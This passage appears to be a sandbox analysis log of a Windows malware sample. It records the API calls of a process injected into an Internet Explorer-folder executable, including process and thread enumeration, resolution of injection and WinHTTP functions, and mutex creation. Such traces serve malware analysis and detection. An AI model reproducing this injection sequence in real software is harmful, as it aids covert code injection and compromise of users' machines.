th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0263.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0263.095] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.095] CloseHandle (hObject=0xd8) returned 1 [0263.095] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0263.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0263.096] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.096] CloseHandle (hObject=0xd8) returned 1 [0263.096] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0263.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0263.096] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.096] CloseHandle (hObject=0xd8) returned 1 [0263.096] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0263.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0263.097] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.097] CloseHandle (hObject=0xd8) returned 1 [0263.097] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0263.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0263.098] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.098] CloseHandle (hObject=0xd8) returned 1 [0263.098] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0263.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0263.098] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0263.099] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0263.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0263.099] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0263.100] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0263.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0263.100] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0263.101] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.101] CloseHandle (hObject=0xd8) returned 1 [0263.101] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0263.101] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0263.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0263.101] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.101] CloseHandle (hObject=0xd8) returned 1 [0263.101] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0263.101] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0263.101] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0263.101] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0263.102] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.102] CloseHandle (hObject=0xd8) returned 1 [0263.102] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0263.103] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.103] CloseHandle (hObject=0xd8) returned 1 [0263.103] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0263.103] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0263.103] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0263.103] CloseHandle (hObject=0xd8) returned 1 [0263.103] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.104] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0263.104] CloseHandle (hObject=0xd4) returned 1 [0263.104] Sleep (dwMilliseconds=0x3e8) Process: id = "19" image_name = "beverages-tapes-dod.exe" filename = "c:\\program files\\internet explorer\\beverages-tapes-dod.exe" page_root = "0x67773000" os_pid = "0x62c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files\\Internet Explorer\\beverages-tapes-dod.exe\" " cur_dir = "C:\\Program Files\\Internet Explorer\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 204 os_tid = 0x9d4 Thread: id = 205 os_tid = 0x5b0 Thread: id = 207 os_tid = 0x5cc [0164.771] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0164.772] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0164.772] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0164.772] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0164.772] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0164.772] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0164.772] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0164.772] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0164.772] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0164.772] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0164.772] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0164.772] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0164.772] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0164.773] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0164.773] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0164.773] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0164.773] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0164.773] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0164.773] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0164.773] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0164.773] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0164.773] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0164.773] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0164.773] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0164.773] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0164.773] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0164.774] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0164.774] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0164.774] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0164.774] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0164.774] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0164.774] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0164.774] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0164.774] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0164.774] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0164.774] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0164.774] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0164.775] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0164.775] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0164.775] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0164.775] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0164.775] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0164.775] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0164.775] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0164.775] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0164.775] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0164.775] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0164.781] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0164.782] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0164.782] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0164.786] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0164.786] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0164.786] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0164.786] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0164.786] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0164.786] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0164.786] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0164.786] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0164.787] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0164.787] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0164.787] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0164.787] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0164.801] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0164.801] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0164.801] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0164.801] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0164.801] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0164.801] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0164.801] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0164.802] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0164.802] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0164.802] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0164.802] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0164.802] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0164.802] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0164.802] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0164.802] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0164.802] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0164.802] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x20dfe98 | out: lpflOldProtect=0x20dfe98*=0x40) returned 1 [0164.803] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x20dfe98 | out: lpflOldProtect=0x20dfe98*=0x4) returned 1 [0164.804] VirtualQuery (in: lpAddress=0xc0016, lpBuffer=0x20dfe90, dwLength=0x1c | out: lpBuffer=0x20dfe90*(BaseAddress=0xc0000, AllocationBase=0xc0000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0164.804] GetProcessHeap () returned 0x5d0000 [0164.804] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x364) returned 0x5f0548 [0164.804] RtlMoveMemory (in: Destination=0x5f0548, Source=0xc0016, Length=0x363 | out: Destination=0x5f0548) [0164.804] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xc0016) returned 0x0 [0164.804] GetCurrentProcessId () returned 0x62c [0164.804] GetProcessHeap () returned 0x5d0000 [0164.804] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x105) returned 0x5f08b8 [0164.804] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x5f08b8, nSize=0x104 | out: lpFilename="C:\\Program Files\\Internet Explorer\\beverages-tapes-dod.exe" (normalized: "c:\\program files\\internet explorer\\beverages-tapes-dod.exe")) returned 0x3a [0164.804] GetProcessHeap () returned 0x5d0000 [0164.805] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x105) returned 0x5f09c8 [0164.805] GetCurrentProcessId () returned 0x62c [0164.805] wsprintfA (in: param_1=0x5f09c8, param_2="%s%d%d%d" | out: param_1="C:\\Program Files\\Internet Explorer\\beverages-tapes-dod.exe37084212415803") returned 72 [0164.805] CryptAcquireContextA (in: phProv=0x20dfe94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x20dfe94*=0x5f0b18) returned 1 [0165.086] CryptCreateHash (in: hProv=0x5f0b18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x20dfe98 | out: phHash=0x20dfe98) returned 1 [0165.087] lstrlenA (lpString="C:\\Program Files\\Internet Explorer\\beverages-tapes-dod.exe37084212415803") returned 72 [0165.087] CryptHashData (hHash=0x5f1430, pbData=0x5f09c8, dwDataLen=0x48, dwFlags=0x0) returned 1 [0165.087] CryptGetHashParam (in: hHash=0x5f1430, dwParam=0x2, pbData=0x20dfe84, pdwDataLen=0x20dfe9c, dwFlags=0x0 | out: pbData=0x20dfe84, pdwDataLen=0x20dfe9c) returned 1 [0165.087] wsprintfA (in: param_1=0x5f09c8, param_2="%02X" | out: param_1="FB") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09ca, param_2="%02X" | out: param_1="B2") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09cc, param_2="%02X" | out: param_1="FF") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09ce, param_2="%02X" | out: param_1="32") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09d0, param_2="%02X" | out: param_1="34") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09d2, param_2="%02X" | out: param_1="1F") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09d4, param_2="%02X" | out: param_1="0B") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09d6, param_2="%02X" | out: param_1="E8") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09d8, param_2="%02X" | out: param_1="DD") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09da, param_2="%02X" | out: param_1="00") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09dc, param_2="%02X" | out: param_1="66") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09de, param_2="%02X" | out: param_1="97") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09e0, param_2="%02X" | out: param_1="43") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09e2, param_2="%02X" | out: param_1="6F") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09e4, param_2="%02X" | out: param_1="77") returned 2 [0165.087] wsprintfA (in: param_1=0x5f09e6, param_2="%02X" | out: param_1="0A") returned 2 [0165.087] CryptDestroyHash (hHash=0x5f1430) returned 1 [0165.087] CryptReleaseContext (hProv=0x5f0b18, dwFlags=0x0) returned 1 [0165.087] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="FBB2FF32341F0BE8DD006697436F770A") returned 0x80 [0165.088] GetLastError () returned 0x0 [0165.088] Sleep (dwMilliseconds=0x1f4) [0165.653] GetCurrentProcessId () returned 0x62c [0165.653] GetCurrentThreadId () returned 0x5cc [0165.653] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0165.655] Thread32First (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.656] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.656] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.656] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.657] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.657] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.657] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.657] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.658] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.658] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.658] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.659] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.659] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.659] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.659] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.660] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.660] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.660] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.661] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.661] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.661] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.661] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.662] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.662] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.662] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.663] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.663] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.663] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.663] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.664] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.664] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.664] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.665] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.666] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.666] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.666] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.666] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.667] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.667] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.667] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.668] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.668] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.668] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.668] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.669] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.669] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.669] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.670] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.670] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.670] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.671] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.671] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.671] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.671] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.672] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.672] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.672] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.672] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.673] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.673] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.674] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.674] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.674] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.674] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.675] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.675] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.675] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.676] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.676] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.676] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.676] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.677] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.677] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.677] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.678] Thread32Next (hSnapshot=0x88, lpte=0x20dfe88) returned 1 [0165.678] Thread32Next (hSnapshot=0x88, 